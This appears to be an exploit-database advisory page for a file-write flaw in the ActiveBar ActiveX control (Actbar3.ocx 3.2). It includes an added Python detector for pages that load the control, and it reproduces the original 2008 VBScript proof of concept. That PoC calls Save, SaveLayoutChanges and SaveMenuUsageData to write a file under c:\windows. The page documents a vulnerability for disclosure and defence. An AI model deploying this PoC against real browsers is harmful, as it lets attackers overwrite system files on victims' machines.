Vendor: ActiveBar ActiveX Control
By: shinnai
CVSS: 9.3 (HIGH)
Title: Multiple Insecure Methods
CWE: 264
Product Name: ActiveBar ActiveX Control
Affected Version From: 3.2
Affected Version To: 3.2
Patch Exists: Yes
Related CWE: N/A
CPE: a:datadynamics:activebar_activex_control
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows
2008

Data Dynamics ActiveBar ActiveX Control (Actbar3.ocx 3.2) Multiple Insecure Methods

Data Dynamics ActiveBar ActiveX Control (Actbar3.ocx 3.2) exposes multiple insecure methods: Save, SaveLayoutChanges and SaveMenuUsageData. Each of these methods can be used to write arbitrary files to the system. An attacker can exploit this with malicious VBScript code to execute arbitrary code on the vulnerable system.
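
One way to flag web content that loads this control and calls the file-writing methods named above. This is an added example, not part of the original advisory or PoC; the function names, the sample pages and the "first non-empty string literal is the path" heuristic are assumptions made for illustration.

```python
import re

ACTBAR_CLSID = "5407153D-022F-4CD2-8BFF-465569BC5DB8"  # classid from the PoC on this page
FILE_METHODS = ("SaveLayoutChanges", "SaveMenuUsageData", "Save")  # methods named in the advisory

OBJECT_TAG = re.compile(r"<object\b[^>]*>", re.I)
ATTR = re.compile(r"""\b(classid|id)\s*=\s*(?:'([^']*)'|"([^"]*)"|([^\s>]+))""", re.I)
STRING_ARG = re.compile(r"""["']([^"'\r\n]*)["']""")

def actbar_object_ids(html):
    """Return the id attribute of each <object> tag that loads the ActiveBar CLSID."""
    ids = []
    for tag in OBJECT_TAG.findall(html):
        attrs = {m.group(1).lower(): next((g for g in m.groups()[1:] if g is not None), "")
                 for m in ATTR.finditer(tag)}
        clsid = attrs.get("classid", "").lower().replace("clsid:", "").strip("{}")
        if clsid == ACTBAR_CLSID.lower():
            ids.append(attrs.get("id", ""))
    return ids

def scan(html):
    """Return (object_id, method, path) per file-writing call; method is None if only loaded."""
    findings = []
    for obj_id in actbar_object_ids(html):
        hits = []
        if obj_id:
            call = re.compile(r"\b%s\.(%s)\b([^\r\n]*)"
                              % (re.escape(obj_id), "|".join(FILE_METHODS)), re.I)
            for m in call.finditer(html):
                method = next(n for n in FILE_METHODS if n.lower() == m.group(1).lower())
                # Heuristic: the first non-empty string literal on the line is the target path.
                path = next((s for s in STRING_ARG.findall(m.group(2)) if s), None)
                hits.append((obj_id, method, path))
        findings.extend(hits or [(obj_id, None, None)])
    return findings

# Constructed sample pages (not captured traffic): one loads the control and calls a
# file-writing method, the other embeds an unrelated, made-up CLSID.
SAMPLE_HIT = """<object classid="CLSID:5407153d-022f-4cd2-8bff-465569bc5db8" id=bar1></object>
<script language="vbscript">
 bar1.SaveLayoutChanges "C:\\Temp\\layout.dat", 1
</script>"""
SAMPLE_CLEAN = "<object classid='clsid:00000000-0000-0000-0000-000000000000' id='x'></object>"

if __name__ == "__main__":
    for name, page in (("hit", SAMPLE_HIT), ("clean", SAMPLE_CLEAN)):
        print(name, scan(page))
```

A finding with a method of None means the page instantiates the control without a visible call to one of the three methods, which is still worth reviewing where the control is not expected.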

Mitigation:

Update to the latest version of Data Dynamics ActiveBar ActiveX Control (Actbar3.ocx 3.2).

Exploit-DB raw data:

<pre>
<code><span style="font: 10pt Courier New;"><span class="general1-symbol"><body bgcolor="#E0E0E0">------------------------------------------------------------------------------------
 <b>Data Dynamics ActiveBar ActiveX Control (Actbar3.ocx 3.2) Multiple Insecure Methods</b>
 url: http://www.datadynamics.com

 author: shinnai
 mail: shinnai[at]autistici[dot]org
 site: http://shinnai.altervista.org
 
 <b><font color='red'>This was written for educational purpose. Use it at your own risk.
 Author will be not responsible for any damage.</font></b>
------------------------------------------------------------------------------------

<object classid='clsid:5407153D-022F-4CD2-8BFF-465569BC5DB8' id='test'></object>

<select style="width: 404px" name="Pucca">
  <option value = "Save">Save</option>
  <option value = "SaveLayoutChanges">SaveLayoutChanges</option>

  <option value = "SaveMenuUsageData">SaveMenuUsageData</option>
</select>

<input language=VBScript onclick=tryMe() type=button value="Click here to start the test">

<script language='vbscript'>
 Sub tryMe
  on error resume next
   Dim MyMsg
   if Pucca.value = "Save" then
    test.Save "", "c:\windows\system_.ini", 1
    MyMsg = MsgBox("Exploit completed!")
   elseif Pucca.value = "SaveLayoutChanges" then
    test.SaveLayoutChanges "c:\windows\system_.ini", 1
    MyMsg = MsgBox("Exploit completed!")
   elseif Pucca.value = "SaveMenuUsageData" then
    test.SaveMenuUsageData "c:\windows\system_.ini", 1
    MyMsg = MsgBox("Exploit completed!")
   end if

 End Sub
</script></span></span></code></pre>

# milw0rm.com [2008-04-07]